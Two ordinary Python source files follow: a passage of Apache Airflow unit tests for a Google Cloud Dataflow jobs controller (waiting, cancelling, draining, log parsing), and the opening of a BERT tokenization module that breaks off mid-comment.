"type": DataflowJobType.JOB_TYPE_BATCH,
"currentState": DataflowJobStatus.JOB_STATE_DONE,
}
# fmt: off
(
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list.return_value.
execute.return_value
) = {
"jobs": [job, job]
}
(
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list_next.return_value
) = None
# fmt: on
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name=UNIQUE_JOB_NAME,
location=TEST_LOCATION,
poll_sleep=10,
job_id=TEST_JOB_ID,
num_retries=20,
multiple_jobs=True,
)
dataflow_job.wait_for_done()
# fmt: off
self.mock_dataflow.projects.return_value.locations.return_value.jobs.return_value.\
list.assert_called_once_with(location=TEST_LOCATION, projectId=TEST_PROJECT)
self.mock_dataflow.projects.return_value.locations.return_value.jobs.return_value.list\
.return_value.execute.assert_called_once_with(num_retries=20)
# fmt: on
assert dataflow_job.get_jobs() == [job, job]
@parameterized.expand(
[
(DataflowJobStatus.JOB_STATE_FAILED, "Google Cloud Dataflow job name-2 has failed\\."),
(DataflowJobStatus.JOB_STATE_CANCELLED, "Google Cloud Dataflow job name-2 was cancelled\\."),
(DataflowJobStatus.JOB_STATE_DRAINED, "Google Cloud Dataflow job name-2 was drained\\."),
(DataflowJobStatus.JOB_STATE_UPDATED, "Google Cloud Dataflow job name-2 was updated\\."),
(
DataflowJobStatus.JOB_STATE_UNKNOWN,
"Google Cloud Dataflow job name-2 was unknown state: JOB_STATE_UNKNOWN",
),
]
)
def test_dataflow_job_wait_for_multiple_jobs_and_one_in_terminal_state(self, state, exception_regex):
# fmt: off
(
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list.return_value.
execute.return_value
) = {
"jobs": [
{
"id": "id-1", "name": "name-1",
"type": DataflowJobType.JOB_TYPE_BATCH,
"currentState": DataflowJobStatus.JOB_STATE_DONE
},
{
"id": "id-2", "name": "name-2",
"type": DataflowJobType.JOB_TYPE_BATCH,
"currentState": state
}
]
}
(
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list_next.return_value
) = None
# fmt: on
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name="name-",
location=TEST_LOCATION,
poll_sleep=0,
job_id=None,
num_retries=20,
multiple_jobs=True,
)
with pytest.raises(Exception, match=exception_regex):
dataflow_job.wait_for_done()
def test_dataflow_job_wait_for_multiple_jobs_and_streaming_jobs(self):
# fmt: off
mock_jobs_list = (
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list
)
mock_jobs_list.return_value.execute.return_value = {
"jobs": [
{
"id": "id-2",
"name": "name-2",
"currentState": DataflowJobStatus.JOB_STATE_RUNNING,
"type": DataflowJobType.JOB_TYPE_STREAMING
}
]
}
(
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list_next.return_value
) = None
# fmt: on
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name="name-",
location=TEST_LOCATION,
poll_sleep=0,
job_id=None,
num_retries=20,
multiple_jobs=True,
)
dataflow_job.wait_for_done()
assert 1 == mock_jobs_list.call_count
def test_dataflow_job_wait_for_single_jobs(self):
job = {
"id": TEST_JOB_ID,
"name": UNIQUE_JOB_NAME,
"type": DataflowJobType.JOB_TYPE_BATCH,
"currentState": DataflowJobStatus.JOB_STATE_DONE,
}
# fmt: off
self.mock_dataflow.projects.return_value.locations.return_value. \
jobs.return_value.get.return_value.execute.return_value = job
(
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list_next.return_value
) = None
# fmt: on
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name=UNIQUE_JOB_NAME,
location=TEST_LOCATION,
poll_sleep=10,
job_id=TEST_JOB_ID,
num_retries=20,
multiple_jobs=False,
)
dataflow_job.wait_for_done()
# fmt: off
self.mock_dataflow.projects.return_value.locations.return_value. \
jobs.return_value.get.assert_called_once_with(
jobId=TEST_JOB_ID,
location=TEST_LOCATION,
projectId=TEST_PROJECT
)
self.mock_dataflow.projects.return_value.locations.return_value. \
jobs.return_value.get.return_value.execute.assert_called_once_with(num_retries=20)
# fmt: on
assert dataflow_job.get_jobs() == [job]
def test_dataflow_job_is_job_running_with_no_job(self):
# fmt: off
mock_jobs_list = (
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list
)
mock_jobs_list.return_value.execute.return_value = {
"jobs": []
}
(
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list_next.return_value
) = None
# fmt: on
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name="name-",
location=TEST_LOCATION,
poll_sleep=0,
job_id=None,
num_retries=20,
multiple_jobs=True,
)
result = dataflow_job.is_job_running()
assert result is False
# fmt: off
@parameterized.expand([
# RUNNING
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_RUNNING, None, False),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_RUNNING, None, True),
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_RUNNING, True, False),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_RUNNING, True, False),
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_RUNNING, False, True),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_RUNNING, False, True),
# AWAITING STATE
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_PENDING, None, False),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_PENDING, None, False),
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_PENDING, True, False),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_PENDING, True, False),
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_PENDING, False, True),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_PENDING, False, True),
])
# fmt: on
def test_check_dataflow_job_state_wait_until_finished(
self, job_type, job_state, wait_until_finished, expected_result
):
job = {"id": "id-2", "name": "name-2", "type": job_type, "currentState": job_state}
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name="name-",
location=TEST_LOCATION,
poll_sleep=0,
job_id=None,
num_retries=20,
multiple_jobs=True,
wait_until_finished=wait_until_finished,
)
result = dataflow_job._check_dataflow_job_state(job)
assert result == expected_result
# fmt: off
@parameterized.expand([
# RUNNING
(DataflowJobStatus.JOB_STATE_RUNNING, None, False),
(DataflowJobStatus.JOB_STATE_RUNNING, True, False),
(DataflowJobStatus.JOB_STATE_RUNNING, False, True),
# AWAITING STATE
(DataflowJobStatus.JOB_STATE_PENDING, None, False),
(DataflowJobStatus.JOB_STATE_PENDING, True, False),
(DataflowJobStatus.JOB_STATE_PENDING, False, True),
])
# fmt: on
def test_check_dataflow_job_state_without_job_type(self, job_state, wait_until_finished, expected_result):
job = {"id": "id-2", "name": "name-2", "currentState": job_state}
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name="name-",
location=TEST_LOCATION,
poll_sleep=0,
job_id=None,
num_retries=20,
multiple_jobs=True,
wait_until_finished=wait_until_finished,
)
result = dataflow_job._check_dataflow_job_state(job)
assert result == expected_result
# fmt: off
@parameterized.expand([
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_FAILED,
"Google Cloud Dataflow job name-2 has failed\\."),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_FAILED,
"Google Cloud Dataflow job name-2 has failed\\."),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_UNKNOWN,
"Google Cloud Dataflow job name-2 was unknown state: JOB_STATE_UNKNOWN"),
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_UNKNOWN,
"Google Cloud Dataflow job name-2 was unknown state: JOB_STATE_UNKNOWN"),
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_CANCELLED,
"Google Cloud Dataflow job name-2 was cancelled\\."),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_CANCELLED,
"Google Cloud Dataflow job name-2 was cancelled\\."),
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_DRAINED,
"Google Cloud Dataflow job name-2 was drained\\."),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_DRAINED,
"Google Cloud Dataflow job name-2 was drained\\."),
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_UPDATED,
"Google Cloud Dataflow job name-2 was updated\\."),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_UPDATED,
"Google Cloud Dataflow job name-2 was updated\\."),
])
# fmt: on
def test_check_dataflow_job_state_terminal_state(self, job_type, job_state, exception_regex):
job = {"id": "id-2", "name": "name-2", "type": job_type, "currentState": job_state}
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name="name-",
location=TEST_LOCATION,
poll_sleep=0,
job_id=None,
num_retries=20,
multiple_jobs=True,
)
with pytest.raises(Exception, match=exception_regex):
dataflow_job._check_dataflow_job_state(job)
def test_dataflow_job_cancel_job(self):
mock_jobs = self.mock_dataflow.projects.return_value.locations.return_value.jobs
get_method = mock_jobs.return_value.get
get_method.return_value.execute.side_effect = [
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_RUNNING},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_PENDING},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_QUEUED},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_CANCELLING},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_DRAINING},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_STOPPED},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_CANCELLED},
]
mock_jobs.return_value.list_next.return_value = None
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name=UNIQUE_JOB_NAME,
location=TEST_LOCATION,
poll_sleep=0,
job_id=TEST_JOB_ID,
num_retries=20,
multiple_jobs=False,
)
dataflow_job.cancel()
get_method.assert_called_with(jobId=TEST_JOB_ID, location=TEST_LOCATION, projectId=TEST_PROJECT)
get_method.return_value.execute.assert_called_with(num_retries=20)
self.mock_dataflow.new_batch_http_request.assert_called_once_with()
mock_batch = self.mock_dataflow.new_batch_http_request.return_value
mock_update = mock_jobs.return_value.update
mock_update.assert_called_once_with(
body={'requestedState': 'JOB_STATE_CANCELLED'},
jobId='test-job-id',
location=TEST_LOCATION,
projectId='test-project',
)
mock_batch.add.assert_called_once_with(mock_update.return_value)
@mock.patch("airflow.providers.google.cloud.hooks.dataflow.timeout")
@mock.patch("time.sleep")
def test_dataflow_job_cancel_job_cancel_timeout(self, mock_sleep, mock_timeout):
mock_jobs = self.mock_dataflow.projects.return_value.locations.return_value.jobs
get_method = mock_jobs.return_value.get
get_method.return_value.execute.side_effect = [
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_CANCELLING},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_CANCELLING},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_CANCELLING},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_CANCELLING},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_CANCELLED},
]
mock_jobs.return_value.list_next.return_value = None
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name=UNIQUE_JOB_NAME,
location=TEST_LOCATION,
poll_sleep=4,
job_id=TEST_JOB_ID,
num_retries=20,
multiple_jobs=False,
cancel_timeout=10,
)
dataflow_job.cancel()
get_method.assert_called_with(jobId=TEST_JOB_ID, location=TEST_LOCATION, projectId=TEST_PROJECT)
get_method.return_value.execute.assert_called_with(num_retries=20)
self.mock_dataflow.new_batch_http_request.assert_called_once_with()
mock_batch = self.mock_dataflow.new_batch_http_request.return_value
mock_update = mock_jobs.return_value.update
mock_update.assert_called_once_with(
body={'requestedState': 'JOB_STATE_CANCELLED'},
jobId='test-job-id',
location=TEST_LOCATION,
projectId='test-project',
)
mock_batch.add.assert_called_once_with(mock_update.return_value)
mock_sleep.assert_has_calls([mock.call(4), mock.call(4), mock.call(4)])
mock_timeout.assert_called_once_with(
seconds=10, error_message='Canceling jobs failed due to timeout (10s): test-job-id'
)
@parameterized.expand(
[
(False, "JOB_TYPE_BATCH", "JOB_STATE_CANCELLED"),
(False, "JOB_TYPE_STREAMING", "JOB_STATE_CANCELLED"),
(True, "JOB_TYPE_BATCH", "JOB_STATE_CANCELLED"),
(True, "JOB_TYPE_STREAMING", "JOB_STATE_DRAINED"),
]
)
def test_dataflow_job_cancel_or_drain_job(self, drain_pipeline, job_type, requested_state):
job = {
"id": TEST_JOB_ID,
"name": UNIQUE_JOB_NAME,
"currentState": DataflowJobStatus.JOB_STATE_RUNNING,
"type": job_type,
}
get_method = self.mock_dataflow.projects.return_value.locations.return_value.jobs.return_value.get
get_method.return_value.execute.return_value = job
# fmt: off
job_list_nest_method = (self.mock_dataflow
.projects.return_value.
locations.return_value.
jobs.return_value.list_next)
job_list_nest_method.return_value = None
# fmt: on
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name=UNIQUE_JOB_NAME,
location=TEST_LOCATION,
poll_sleep=10,
job_id=TEST_JOB_ID,
num_retries=20,
multiple_jobs=False,
drain_pipeline=drain_pipeline,
cancel_timeout=None,
)
dataflow_job.cancel()
get_method.assert_called_once_with(jobId=TEST_JOB_ID, location=TEST_LOCATION, projectId=TEST_PROJECT)
get_method.return_value.execute.assert_called_once_with(num_retries=20)
self.mock_dataflow.new_batch_http_request.assert_called_once_with()
mock_batch = self.mock_dataflow.new_batch_http_request.return_value
mock_update = self.mock_dataflow.projects.return_value.locations.return_value.jobs.return_value.update
mock_update.assert_called_once_with(
body={'requestedState': requested_state},
jobId='test-job-id',
location=TEST_LOCATION,
projectId='test-project',
)
mock_batch.add.assert_called_once_with(mock_update.return_value)
mock_batch.execute.assert_called_once()
def test_dataflow_job_cancel_job_no_running_jobs(self):
mock_jobs = self.mock_dataflow.projects.return_value.locations.return_value.jobs
get_method = mock_jobs.return_value.get
get_method.return_value.execute.side_effect = [
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_DONE},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_UPDATED},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_DRAINED},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_FAILED},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_CANCELLED},
]
mock_jobs.return_value.list_next.return_value = None
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name=UNIQUE_JOB_NAME,
location=TEST_LOCATION,
poll_sleep=0,
job_id=TEST_JOB_ID,
num_retries=20,
multiple_jobs=False,
)
dataflow_job.cancel()
get_method.assert_called_with(jobId=TEST_JOB_ID, location=TEST_LOCATION, projectId=TEST_PROJECT)
get_method.return_value.execute.assert_called_with(num_retries=20)
self.mock_dataflow.new_batch_http_request.assert_not_called()
mock_jobs.return_value.update.assert_not_called()
def test_fetch_list_job_messages_responses(self):
# fmt: off
mock_list = (
self.mock_dataflow
.projects.return_value
.locations.return_value
.jobs.return_value
.messages.return_value
.list
)
mock_list_next = (
self.mock_dataflow.
projects.return_value.
locations.return_value.
jobs.return_value
.messages.return_value
.list_next
)
# fmt: on
mock_list.return_value.execute.return_value = "response_1"
mock_list_next.return_value = None
jobs_controller = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
location=TEST_LOCATION,
job_id=TEST_JOB_ID,
)
result = list(jobs_controller._fetch_list_job_messages_responses(TEST_JOB_ID))
mock_list.assert_called_once_with(projectId=TEST_PROJECT, location=TEST_LOCATION, jobId=TEST_JOB_ID)
mock_list_next.assert_called_once_with(
previous_request=mock_list.return_value, previous_response="response_1"
)
assert result == ["response_1"]
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController._fetch_list_job_messages_responses'))
def test_fetch_job_messages_by_id(self, mock_fetch_responses):
mock_fetch_responses.return_value = iter(
[
{"jobMessages": ["message_1"]},
{"jobMessages": ["message_2"]},
]
)
jobs_controller = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
location=TEST_LOCATION,
job_id=TEST_JOB_ID,
)
result = jobs_controller.fetch_job_messages_by_id(TEST_JOB_ID)
mock_fetch_responses.assert_called_once_with(job_id=TEST_JOB_ID)
assert result == ['message_1', 'message_2']
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController._fetch_list_job_messages_responses'))
def test_fetch_job_autoscaling_events_by_id(self, mock_fetch_responses):
mock_fetch_responses.return_value = iter(
[
{"autoscalingEvents": ["event_1"]},
{"autoscalingEvents": ["event_2"]},
]
)
jobs_controller = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
location=TEST_LOCATION,
job_id=TEST_JOB_ID,
)
result = jobs_controller.fetch_job_autoscaling_events_by_id(TEST_JOB_ID)
mock_fetch_responses.assert_called_once_with(job_id=TEST_JOB_ID)
assert result == ['event_1', 'event_2']
APACHE_BEAM_V_2_14_0_JAVA_SDK_LOG = f"""\
Dataflow SDK version: 2.14.0
Jun 15, 2020 2:57:28 PM org.apache.beam.runners.dataflow.DataflowRunner run
INFO: To access the Dataflow monitoring console, please navigate to https://console.cloud.google.com/dataflow\
/jobsDetail/locations/europe-west3/jobs/{TEST_JOB_ID}?project=XXX
Submitted job: {TEST_JOB_ID}
Jun 15, 2020 2:57:28 PM org.apache.beam.runners.dataflow.DataflowRunner run
INFO: To cancel the job using the 'gcloud' tool, run:
> gcloud dataflow jobs --project=XXX cancel --region=europe-west3 {TEST_JOB_ID}
"""
APACHE_BEAM_V_2_22_0_JAVA_SDK_LOG = f"""\
INFO: Dataflow SDK version: 2.22.0
Jun 15, 2020 3:09:03 PM org.apache.beam.runners.dataflow.DataflowRunner run
INFO: To access the Dataflow monitoring console, please navigate to https://console.cloud.google.com/dataflow\
/jobs/europe-west3/{TEST_JOB_ID}?project=XXXX
Jun 15, 2020 3:09:03 PM org.apache.beam.runners.dataflow.DataflowRunner run
INFO: Submitted job: {TEST_JOB_ID}
Jun 15, 2020 3:09:03 PM org.apache.beam.runners.dataflow.DataflowRunner run
INFO: To cancel the job using the 'gcloud' tool, run:
> gcloud dataflow jobs --project=XXX cancel --region=europe-west3 {TEST_JOB_ID}
"""
APACHE_BEAM_V_2_14_0_PYTHON_SDK_LOG = f"""\
INFO:root:Completed GCS upload to gs://test-dataflow-example/staging/start-python-job-local-5bcf3d71.\
1592286375.000962/apache_beam-2.14.0-cp37-cp37m-manylinux1_x86_64.whl in 0 seconds.
INFO:root:Create job: <Job
createTime: '2020-06-16T05:46:20.911857Z'
currentStateTime: '1970-01-01T00:00:00Z'
id: '{TEST_JOB_ID}'
location: 'us-central1'
name: 'start-python-job-local-5bcf3d71'
projectId: 'XXX'
stageStates: []
startTime: '2020-06-16T05:46:20.911857Z'
steps: []
tempFiles: []
type: TypeValueValuesEnum(JOB_TYPE_BATCH, 1)>
INFO:root:Created job with id: [{TEST_JOB_ID}]
INFO:root:To access the Dataflow monitoring console, please navigate to https://console.cloud.google.com/\
dataflow/jobsDetail/locations/us-central1/jobs/{TEST_JOB_ID}?project=XXX
"""
APACHE_BEAM_V_2_22_0_PYTHON_SDK_LOG = f"""\
INFO:apache_beam.runners.dataflow.internal.apiclient:Completed GCS upload to gs://test-dataflow-example/\
staging/start-python-job-local-5bcf3d71.1592286719.303624/apache_beam-2.22.0-cp37-cp37m-manylinux1_x86_64.whl\
in 1 seconds.
INFO:apache_beam.runners.dataflow.internal.apiclient:Create job: <Job
createTime: '2020-06-16T05:52:04.095216Z'
currentStateTime: '1970-01-01T00:00:00Z'
id: '{TEST_JOB_ID}'
location: 'us-central1'
name: 'start-python-job-local-5bcf3d71'
projectId: 'XXX'
stageStates: []
startTime: '2020-06-16T05:52:04.095216Z'
steps: []
tempFiles: []
type: TypeValueValuesEnum(JOB_TYPE_BATCH, 1)>
INFO:apache_beam.runners.dataflow.internal.apiclient:Created job with id: [{TEST_JOB_ID}]
INFO:apache_beam.runners.dataflow.internal.apiclient:Submitted job: {TEST_JOB_ID}
INFO:apache_beam.runners.dataflow.internal.apiclient:To access the Dataflow monitoring console, please \
navigate to https://console.cloud.google.com/dataflow/jobs/us-central1/{TEST_JOB_ID}?project=XXX
"""
class TestDataflow(unittest.TestCase):
@parameterized.expand(
[
(APACHE_BEAM_V_2_14_0_JAVA_SDK_LOG,),
(APACHE_BEAM_V_2_22_0_JAVA_SDK_LOG,),
(APACHE_BEAM_V_2_14_0_PYTHON_SDK_LOG,),
(APACHE_BEAM_V_2_22_0_PYTHON_SDK_LOG,),
],
name_func=lambda func, num, p: f"{func.__name__}_{num}",
)
def test_data_flow_valid_job_id(self, log):
echos = ";".join(f"echo {shlex.quote(line)}" for line in log.split("\n"))
cmd = ["bash", "-c", echos]
found_job_id = None
def callback(job_id):
nonlocal found_job_id
found_job_id = job_id
BeamCommandRunner(
cmd, process_line_callback=process_line_and_extract_dataflow_job_id_callback(callback)
).wait_for_done()
self.assertEqual(found_job_id, TEST_JOB_ID)
def test_data_flow_missing_job_id(self):
cmd = ['echo', 'unit testing']
found_job_id = None
def callback(job_id):
nonlocal found_job_id
found_job_id = job_id
BeamCommandRunner(
cmd, process_line_callback=process_line_and_extract_dataflow_job_id_callback(callback)
).wait_for_done()
self.assertEqual(found_job_id, None)
@mock.patch('airflow.providers.apache.beam.hooks.beam.BeamCommandRunner.log')
@mock.patch('subprocess.Popen')
@mock.patch('select.select')
def test_dataflow_wait_for_done_logging(self, mock_select, mock_popen, mock_logging):
mock_logging.info = MagicMock()
mock_logging.warning = MagicMock()
mock_proc = MagicMock()
mock_proc.stderr = MagicMock()
mock_proc.stderr.readlines = MagicMock(return_value=['test\n', 'error\n'])
mock_stderr_fd = MagicMock()
mock_proc.stderr.fileno = MagicMock(return_value=mock_stderr_fd)
mock_proc_poll = MagicMock()
mock_select.return_value = [[mock_stderr_fd]]
def poll_resp_error():
mock_proc.return_code = 1
return True
mock_proc_poll.side_effect = [None, poll_resp_error]
mock_proc.poll = mock_proc_poll
mock_popen.return_value = mock_proc
dataflow = BeamCommandRunner(['test', 'cmd'])
mock_logging.info.assert_called_once_with('Running command: %s', 'test cmd')
self.assertRaises(Exception, dataflow.wait_for_done)
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tokenization classes."""
import os, sys
sys.path.insert(0, os.getcwd())
import collections
import re
import unicodedata
import six
def validate_case_matches_checkpoint(do_lower_case, init_checkpoint):
"""Checks whether the casing config is consistent with the checkpoint name."""
# The casing has to be passed in by the user and there is no explicit check
# as to whether it matches the checkpoint. The casing information probably
# should have been stored in the bert_config.json file, but it's not, so
# we have to heuristically detect it to validate.
if not init_checkpoint:
return
m = re.match("^.*?([A-Za-z0-9_-]+)/bert_model.ckpt", init_checkpoint)
if m is None:
return
model_name = m.group(1)
lower_models = [
"uncased_L-24_H-1024_A-16", "uncased_L-12_H-768_A-12",
"multilingual_L-12_H-768_A-12", "chinese_L-12_H-768_A-12"
]
cased_models = [
"cased_L-12_H-768_A-12", "cased_L-24_H-1024_A-16",
"multi_cased_L-12_H-768_A-12"
]
is_bad_config = False
if model_name in lower_models and not do_lower_case:
is_bad_config = True
actual_flag = "False"
case_name = "lowercased"
opposite_flag = "True"
if model_name in cased_models and do_lower_case:
is_bad_config = True
actual_flag = "True"
case_name = "cased"
opposite_flag = "False"
if is_bad_config:
raise ValueError(
"You passed in `--do_lower_case=%s` with `--init_checkpoint=%s`. "
"However, `%s` seems to be a %s model, so you "
"should pass in `--do_lower_case=%s` so that the fine-tuning matches "
"how the model was pre-training. If this error is wrong, please "
"just comment out this check." % (actual_flag, init_checkpoint,
model_name, case_name, opposite_flag))
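# Illustrative usage (hypothetical checkpoint path): a lowercased model with
# do_lower_case=False trips the check above.
#
#   validate_case_matches_checkpoint(
#       do_lower_case=False,
#       init_checkpoint="uncased_L-12_H-768_A-12/bert_model.ckpt")
#   # -> ValueError: You passed in `--do_lower_case=False` ...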
def convert_to_unicode(text):
"""Converts `text` to Unicode (if it's not already), assuming utf-8 input."""
if six.PY3:
if isinstance(text, str):
return text
elif isinstance(text, bytes):
return text.decode("utf-8", "ignore")
else:
raise ValueError("Unsupported string type: %s" % (type(text)))
elif six.PY2:
if isinstance(text, str):
return text.decode("utf-8", "ignore")
elif isinstance(text, unicode):
return text
else:
raise ValueError("Unsupported string type: %s" % (type(text)))
else:
raise ValueError("Not running on Python2 or Python 3?")
def printable_text(text):
"""Returns text encoded in a way suitable for print or `tf.logging`."""
# These functions want `str` for both Python2 and Python3, but in one case
# it's a Unicode string and in the other it's a byte string.
if six.PY3:
if isinstance(text, str):
return text
elif isinstance(text, bytes):
return text.decode("utf-8", "ignore")
else:
raise ValueError("Unsupported string type: %s" % (type(text)))
elif six.PY2:
if isinstance(text, str):
return text
elif isinstance(text, unicode):
return text.encode("utf-8")
else:
raise ValueError("Unsupported string type: %s" % (type(text)))
else:
raise ValueError("Not running on Python2 or Python 3?")
def load_vocab(vocab_file):
"""Loads a vocabulary file into a dictionary."""
vocab = collections.OrderedDict()
index = 0
with open(vocab_file, "r", encoding='utf-8') as reader:
while True:
token = convert_to_unicode(reader.readline())
if not token:
break
token = token.strip()
vocab[token] = index
index += 1
return vocab
def convert_by_vocab(vocab, items):
"""Converts a sequence of [tokens|ids] using the vocab."""
output = []
for item in items:
output.append(vocab[item])
return output
def convert_tokens_to_ids(vocab, tokens):
return convert_by_vocab(vocab, tokens)
def convert_ids_to_tokens(inv_vocab, ids):
return convert_by_vocab(inv_vocab, ids)
def whitespace_tokenize(text):
"""Runs basic whitespace cleaning and splitting on a piece of text."""
text = text.strip()
if not text:
return []
tokens = text.split()
return tokens
class FullTokenizer(object):
"""Runs end-to-end tokenziation."""
def __init__(self, vocab_file, do_lower_case=True):
self.vocab = load_vocab(vocab_file)
self.inv_vocab = {v: k for k, v in self.vocab.items()}
self.basic_tokenizer = BasicTokenizer(do_lower_case=do_lower_case)
self.wordpiece_tokenizer = WordpieceTokenizer(vocab=self.vocab)
def tokenize(self, text):
split_tokens = []
for token in self.basic_tokenizer.tokenize(text):
for sub_token in self.wordpiece_tokenizer.tokenize(token):
split_tokens.append(sub_token)
return split_tokens
def convert_tokens_to_ids(self, tokens):
return convert_by_vocab(self.vocab, tokens)
def convert_ids_to_tokens(self, ids):
return convert_by_vocab(self.inv_vocab, ids)
class BertTokenizer(object):
"""Runs end-to-end tokenization: punctuation splitting + wordpiece"""
def __init__(self, vocab_file, do_lower_case=True):
self.vocab = load_vocab(vocab_file)
self.ids_to_tokens = collections.OrderedDict(
[(ids, tok) for tok, ids in self.vocab.items()])
self.basic_tokenizer = BasicTokenizer(do_lower_case=do_lower_case)
self.wordpiece_tokenizer = WordpieceTokenizer(vocab=self.vocab)
def tokenize(self, text):
split_tokens = []
for token in self.basic_tokenizer.tokenize(text):
for sub_token in self.wordpiece_tokenizer.tokenize(token):
split_tokens.append(sub_token)
return split_tokens
def convert_tokens_to_ids(self, tokens):
"""Converts a sequence of tokens into ids using the vocab."""
ids = []
for token in tokens:
ids.append(self.vocab[token])
return ids
def convert_ids_to_tokens(self, ids):
"""Converts a sequence of ids in wordpiece tokens using the vocab."""
tokens = []
for i in ids:
tokens.append(self.ids_to_tokens[i])
return tokens
class BasicTokenizer(object):
"""Runs basic tokenization (punctuation splitting, lower casing, etc.)."""
def __init__(self, do_lower_case=True):
"""Constructs a BasicTokenizer.
Args:
do_lower_case: Whether to lower case the input.
"""
self.do_lower_case = do_lower_case
def tokenize(self, text):
"""Tokenizes a piece of text."""
text = convert_to_unicode(text)
text = self._clean_text(text)
# This was added on November 1st, 2018 for the multilingual and Chinese
# models. This is also applied to the English models now, but it doesn't
# matter since the English models were not trained on any Chinese data
# and generally don't have any Chinese data in them (there are Chinese
# characters in the vocabulary because Wikipedia does have some Chinese
